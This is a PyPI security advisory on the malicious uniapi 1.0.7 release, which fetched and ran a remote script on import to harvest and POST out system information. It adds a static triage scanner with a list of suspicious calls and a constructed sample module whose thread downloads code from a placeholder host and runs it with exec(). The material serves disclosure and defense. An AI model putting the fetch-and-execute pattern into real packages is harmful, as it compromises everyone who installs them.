PYSEC-2025-2

Vulnerability from pysec - Published: - Updated: 2025-01-24 19:56
Details

uniapi version 1.0.7 introduces code that executes on import of the module: it downloads a script from a remote URL and then executes the downloaded script in a thread. The downloaded script harvests system information and POSTs it to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository, so the published package does not match the published source.
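The import-time fetch-and-execute pattern described above can be triaged statically before a package is installed. The following is an added example, not part of the PYSEC-2025-2 record and not uniapi's own code: it parses a module with Python's ast module, works out which calls run at import time (module scope, class bodies, and functions reached from module scope, including a function handed to threading.Thread(target=...)), and flags network fetches, dynamic code execution and thread starts. The two sample modules are constructed for the demo and do not reproduce the real payload; example.invalid is a placeholder host.

```python
"""Static triage for import-time dropper behaviour in a Python module.

Added example for this advisory; not part of the PYSEC-2025-2 record and not
uniapi's own code.  Sample modules below are constructed, not the real payload.
"""
from __future__ import annotations

import ast
from dataclasses import dataclass
from typing import Iterator

# Dotted call names to flag.  Matching is on the name as written in the source;
# aliases and obfuscation are not resolved, so this is triage, not proof.
SUSPICIOUS = {
    "network": {"urllib.request.urlopen", "urlopen", "requests.get", "requests.post",
                "http.client.HTTPSConnection", "socket.create_connection"},
    "exec": {"exec", "eval", "compile", "builtins.exec", "builtins.eval"},
    "thread": {"threading.Thread", "Thread", "threading.Timer", "Timer"},
}


@dataclass(frozen=True)
class Finding:
    kind: str        # key of SUSPICIOUS
    call: str        # dotted call name as written
    lineno: int
    at_import: bool  # True when the call runs as a side effect of `import`


def _dotted(node: ast.AST) -> str | None:
    """Render a call target such as `urllib.request.urlopen` as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None  # e.g. `something().start()`: callee is not a plain name


def _calls(node: ast.AST, skip_defs: bool) -> Iterator[ast.Call]:
    """Yield every Call below `node`; skip function/lambda bodies if asked."""
    for child in ast.iter_child_nodes(node):
        if skip_defs and isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            continue  # a def at module scope does not run until called
        if isinstance(child, ast.Call):
            yield child
        yield from _calls(child, skip_defs)


def _invoked(call: ast.Call) -> list[str]:
    """Names a call may run: its callee, plus any `target=` keyword (Thread/Timer)."""
    names = [_dotted(call.func)]
    names += [_dotted(kw.value) for kw in call.keywords if kw.arg == "target"]
    return [n for n in names if n]


def scan_module(source: str) -> list[Finding]:
    tree = ast.parse(source)
    funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}

    # Pass 1: which module-level functions are reachable from import-time code?
    # Seed with module-scope statements and follow calls transitively.  Bodies
    # of reached functions are taken whole (over-approximation is fine here).
    reachable: set[str] = set()
    pending: list[ast.AST] = [s for s in tree.body if not isinstance(s, ast.FunctionDef)]
    while pending:
        node = pending.pop()
        for call in _calls(node, skip_defs=not isinstance(node, ast.FunctionDef)):
            for name in _invoked(call):
                if name in funcs and name not in reachable:
                    reachable.add(name)
                    pending.append(funcs[name])

    # Pass 2: classify every flagged call and tag it with its execution scope.
    findings: list[Finding] = []
    for stmt in tree.body:
        is_def = isinstance(stmt, ast.FunctionDef)
        at_import = (not is_def) or stmt.name in reachable
        for call in _calls(stmt, skip_defs=not is_def):
            name = _dotted(call.func)
            for kind, names in SUSPICIOUS.items():
                if name in names:
                    findings.append(Finding(kind, name, call.lineno, at_import))
    return sorted(findings, key=lambda f: f.lineno)


def looks_like_import_time_dropper(source: str) -> bool:
    """Triage rule: a remote fetch and dynamic exec that both run on import."""
    kinds = {f.kind for f in scan_module(source) if f.at_import}
    return {"network", "exec"} <= kinds


# Constructed sample mimicking the advisory's pattern (NOT the real uniapi code):
# a module-scope Thread runs a function that fetches a script and exec()s it.
DROPPER_SAMPLE = '''\
import threading
import urllib.request

__version__ = "1.0.7"

def _bootstrap():
    code = urllib.request.urlopen("https://example.invalid/stage2.py").read()
    exec(compile(code, "<remote>", "exec"), {})

threading.Thread(target=_bootstrap, daemon=True).start()

def unify(*apis):
    return list(apis)
'''

# Constructed benign sample: the same network call, but only when a caller asks.
BENIGN_SAMPLE = '''\
import urllib.request

def fetch(url):
    return urllib.request.urlopen(url).read()
'''

if __name__ == "__main__":
    for f in scan_module(DROPPER_SAMPLE):
        print(f)
    print("dropper:", looks_like_import_time_dropper(DROPPER_SAMPLE))
    print("benign:", looks_like_import_time_dropper(BENIGN_SAMPLE))
```

To use it on a real release, extract the sdist or wheel and pass the text of each module (starting with __init__.py) to scan_module; any finding with at_import set deserves a manual look. Name matching is a weak signal on its own: getattr tricks, base64-wrapped code and renamed imports all evade it, which is why the stronger check remains the one the advisory itself relies on, comparing the PyPI artifact against the tagged source in the project's repository and treating any file that exists only in the artifact as suspect.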

Impacted products
Name      purl
uniapi    pkg:pypi/uniapi

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "uniapi",
        "purl": "pkg:pypi/uniapi"
      },
      "versions": [
        "1.0.7"
      ]
    }
  ],
  "credits": [
    {
      "name": "Mike Fiedler",
      "type": "COORDINATOR"
    },
    {
      "name": "Kamil Ma\u0144kowski",
      "type": "REPORTER"
    }
  ],
  "details": "uniapi version 1.0.7 introduces code that would execute\non import of the module and download a script from a remote URL,\nand would then execute the downloaded script in a thread.\nThe downloaded script would harvest system information\nand `POST` the information to another remote URL.\nThis code was found in the PyPI release artifacts and was not present\nin the public GitHub repository.\n",
  "id": "PYSEC-2025-2",
  "modified": "2025-01-24T19:56:53+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kam193/package-campaigns/blob/main/pypi/campaigns/highly_suspicious/2025-01-uniapi.json"
    }
  ],
  "summary": "uniapi version 1.0.7 contained an information harvesting script."
}

